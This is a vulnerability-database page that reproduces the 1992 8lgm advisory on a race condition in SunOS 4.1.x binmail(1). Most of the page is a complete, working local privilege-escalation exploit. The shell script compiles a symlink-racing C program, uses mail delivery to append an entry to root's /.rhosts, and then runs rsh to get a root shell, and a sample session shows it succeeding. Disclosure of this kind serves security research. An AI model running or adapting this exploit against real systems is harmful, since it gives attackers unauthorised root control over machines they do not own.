Lucene search
K

sunhack.sh

🗓️ 17 Aug 1999 00:00:00Reported by Packet StormType 
packetstorm
 packetstorm
🔗 packetstormsecurity.com👁 23 Views

Race condition in binmail(1) allows users to gain root access on SunOS systems.

Code
`===========================================================================  
[8lgm]-Advisory-5.UNIX.mail.24-Jan-1992  
  
  
PROGRAM:  
  
binmail(1) (/usr/bin/mail)  
  
VULNERABLE OS's:  
  
SunOS 4.1.x  
  
(Possibly other platforms - see DISCUSSION)  
  
DESCRIPTION:  
  
A race condition exists in binmail(1), which allows files to  
be created in arbitrary places on the filesystem. These files  
can be owned by arbitrary (usually system) users.  
  
IMPACT:  
  
Any user with access to binmail(1) can become root.  
  
REPEAT BY:  
  
This example demonstrates how to become root on most affected  
machines by creating/appending-to root's .rhosts file. Please  
do not do this unless you have permission.  
  
Create the following file, 'mailscript':  
  
8<--------------------------- cut here ----------------------------  
#!/bin/sh  
#  
# Syntax: mailscript user target-file rsh-user  
#  
# This exploits a flaw in SunOS binmail(1), and attempts  
# to become the specified 'user', by creating a .rhosts  
# file and using rsh.  
#  
# Written 1992 by [8LGM]  
# Please do not use this script without permission.  
#  
PATH=/usr/ucb:/usr/bin:/bin export PATH  
IFS=" " export IFS  
  
PROG="`basename $0`"  
SPOOLDIR="/var/spool/mail"  
  
# Check args  
if [ $# -ne 3 ]; then  
echo "Syntax: $PROG user target-file rsh-user"  
exit 1  
fi  
TARGET="$1"  
TARGET_FILE="$2"  
RSH_USER="$3"  
  
# Check we're on SunOS  
if [ "x`uname -s`" != "xSunOS" ]; then  
echo "Sorry, this only works on SunOS"  
exit 1  
fi  
  
# Check user exists  
grep "^$TARGET:" /etc/passwd >/dev/null 2>&1  
if [ $? -ne 0 ]; then  
echo "$PROG: Warning, $TARGET not in local passwd file"  
# We continue though, might be in the YP passwd file  
fi  
  
# Check target file  
if [ -f $TARGET_FILE ]; then  
OLD_TARGET_LEN=`ls -ld $TARGET_FILE | awk -F' ' '{print $4}'`  
2>/dev/null  
echo "$PROG: Warning, $TARGET_FILE already exists, appending"  
else  
OLD_TARGET_LEN=0  
fi  
  
# Delete spool file if its a link, and we are able  
if [ -h "$SPOOLDIR/$TARGET" ]; then  
rm -f "$SPOOLDIR/$TARGET"  
# Dont worry about errors, we catch it below  
fi  
  
# Check mail file  
if [ -f "$SPOOLDIR/$TARGET" ]; then  
echo "$PROG: ${TARGET}'s mail file exists."  
exit 1  
fi  
  
# Make the race program  
cat >mailrace.c << 'EOF'  
#include <stdio.h>  
  
main(argc,argv)  
int argc;  
char *argv[];  
{  
if (argc != 3) {  
fprintf(stderr, "Usage: %s mailfile newfile\n", argv[0]);  
exit(1);  
}  
  
for (;;) {  
unlink(argv[1]);  
symlink(argv[2], argv[1]);  
}  
}  
EOF  
cc -o mailrace mailrace.c  
  
# Check we now have mailrace  
if [ ! -x "mailrace" ]; then  
echo "$PROG: couldnt compile mailrace.c - check it out"  
exit 1  
fi  
  
# Start mailrace  
./mailrace $SPOOLDIR/$TARGET $TARGET_FILE &  
RACE_PID=$!  
  
# Send mail to the user  
NEW_TARGET_LEN=$OLD_TARGET_LEN  
while [ "x$NEW_TARGET_LEN" = "x$OLD_TARGET_LEN" ]; do  
echo "Sending mail to $TARGET"  
echo "localhost $USER" | /bin/mail $TARGET  
sleep 10  
kill -STOP $RACE_PID  
rm -f $SPOOLDIR/$TARGET >/dev/null 2>&1  
if [ -f $SPOOLDIR/$TARGET ]; then  
echo "$PROG: Sorry, we lost the race - cant try again."  
kill -9 $RACE_PID  
exit 1  
fi  
kill -CONT $RACE_PID  
if [ -f "$TARGET_FILE" ]; then  
NEW_TARGET_LEN=`ls -ld $TARGET_FILE | awk -F' ' '{print $4}'`  
2>/dev/null  
else  
NEW_TARGET_LEN=0  
fi  
if [ "x$NEW_TARGET_LEN" = "x$OLD_TARGET_LEN" ]; then  
echo "We drew the race that time, trying again"  
fi  
done  
  
# We won the race  
kill -9 $RACE_PID  
echo "We won the race, becoming $RSH_USER"  
rsh localhost -l $RSH_USER sh -i  
exit 0  
8<--------------------------- cut here ----------------------------  
  
(Lines marked with > represent user input)  
  
Check what root users are on the system:  
  
> % grep :0: /etc/passwd  
root:*:0:1:Operator:/:/bin/csh  
sysdiag:*:0:1:Old System  
Diagnostic:/usr/diag/sysdiag:/usr/diag/sysdiag/sysdiag  
sundiag:*:0:1:System  
Diagnostic:/usr/diag/sundiag:/usr/diag/sundiag/sundiag  
+::0:0:::  
  
We choose a user with UID 0, but without a /var/spool/mail/<username> file:  
  
> % ls -l /var/spool/mail/sysdiag  
/var/spool/mail/sysdiag not found  
  
Execute mailscript. The user is sysdiag, the target file is /.rhosts, and  
the user to rsh to on success is root:  
  
> % chmod 700 mailscript  
> % ./mailscript sysdiag /.rhosts root  
mailscript: Warning, /.rhosts already exists, appending  
Sending mail to sysdiag  
We won the race, becoming root  
./mailscript: 11051 Killed  
#  
  
`

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

17 Aug 1999 00:00Current
7.4High risk
Vulners AI Score7.4
23